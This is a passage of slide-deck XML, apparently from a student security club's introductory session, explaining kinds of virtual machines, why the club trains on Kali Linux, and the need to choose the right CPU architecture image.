        <p:nvSpPr>
          <p:cNvPr id="523" name="Google Shape;523;p30"/>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28" name="Shape 528"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="529" name="Google Shape;529;p31"/>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KINDS OF VMS</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="Google Shape;530;p31"/>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Different kinds of virtual machines</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="Google Shape;531;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48006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2" name="Google Shape;532;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67208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33" name="Google Shape;533;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="732709" y="1658539"/>
            <a:ext cx="345095" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Google Shape;534;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123444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System VM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="Google Shape;535;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234440" y="1851660"/>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full computer: its own kernel, its own OS, its own disk. What you're building tonight with Kali. Fully isolated from the host.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="Google Shape;536;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469773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7" name="Google Shape;537;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488975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docker-white.png" id="538" name="Google Shape;538;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4959706" y="1667866"/>
            <a:ext cx="326440" cy="326440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="Google Shape;539;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545211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Container</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Google Shape;540;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452110" y="1851660"/>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Shares the host's kernel instead of running its own. Lighter and faster than a system VM, but less isolated. Example: Docker.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Google Shape;541;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48006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2" name="Google Shape;542;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67208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43" name="Google Shape;543;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="732709" y="3338749"/>
            <a:ext cx="345095" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Google Shape;544;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123444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Process VM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Google Shape;545;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234440" y="3531870"/>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Virtualizes a single program's runtime, not a whole computer. Example: the Java Virtual Machine (JVM). Not what we mean by "VM" in this club.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="Google Shape;546;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469773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7" name="Google Shape;547;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488975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48" name="Google Shape;548;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4950379" y="3338749"/>
            <a:ext cx="345094" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="Google Shape;549;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545211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Cloud-hosted VM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="Google Shape;550;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452110" y="3531870"/>
            <a:ext cx="3051810" cy="9601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 system VM running on someone else's hypervisor entirely. You never touch the hardware, just SSH or RDP in. Example: the Range, AWS, competition boxes.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Google Shape;551;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="4560570"/>
            <a:ext cx="81610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900"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1C7268"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Tonight we're building a System VM locally. Thursday, you'll SSH into a Cloud-hosted VM: the Range.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Google Shape;552;p31"/>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Kinds of VMs</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="Google Shape;553;p31"/>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8" name="Shape 558"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="559" name="Google Shape;559;p32"/>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OUR STANDARD DISTRO</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Google Shape;560;p32"/>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Why we </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>train</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t> on Kali Linux</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Google Shape;561;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48006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2" name="Google Shape;562;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67208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63" name="Google Shape;563;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="732709" y="1658539"/>
            <a:ext cx="345095" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="Google Shape;564;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123444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Purpose-built</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Google Shape;565;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234440" y="185166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A Debian-based distro built specifically for security testing and forensics.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="Google Shape;566;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="140589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67" name="Google Shape;567;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889754" y="159791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68" name="Google Shape;568;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4950379" y="1658539"/>
            <a:ext cx="345094" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Google Shape;569;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452110" y="157734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Tools pre-installed</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="Google Shape;570;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452110" y="185166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Wireshark, nmap, Metasploit, and hundreds more, ready on first boot.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Google Shape;571;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48006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2" name="Google Shape;572;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67208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73" name="Google Shape;573;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="732709" y="3338749"/>
            <a:ext cx="345095" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Google Shape;574;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123444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Industry standard</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="575" name="Google Shape;575;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234440" y="353187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Maintained by Offensive Security. Referenced in almost every writeup and course.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Google Shape;576;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="3086100"/>
            <a:ext cx="394335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77" name="Google Shape;577;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889754" y="3278124"/>
            <a:ext cx="466344" cy="466344"/>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78" name="Google Shape;578;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4950379" y="3338749"/>
            <a:ext cx="345094" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579" name="Google Shape;579;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452110" y="3257550"/>
            <a:ext cx="305181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1100"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Disposable by design</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="580" name="Google Shape;580;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452110" y="3531870"/>
            <a:ext cx="305181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A sandbox environment you can snapshot, break, and rebuild without risk.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Google Shape;581;p32"/>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Why Kali Linux</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582" name="Google Shape;582;p32"/>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587" name="Shape 587"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="588" name="Google Shape;588;p33"/>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CPU ARCHITECTURE</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Google Shape;589;p33"/>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Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Know your architecture first</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590" name="Google Shape;590;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1131570"/>
            <a:ext cx="81610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000"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E6DFD5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Kali ships different images for different CPU architectures. Grab the wrong one and your VM won't boot, full stop.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591" name="Google Shape;591;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1645920"/>
            <a:ext cx="3909060" cy="2811780"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 1951"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2" name="Google Shape;592;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1851660"/>
            <a:ext cx="548640" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3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593" name="Google Shape;593;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
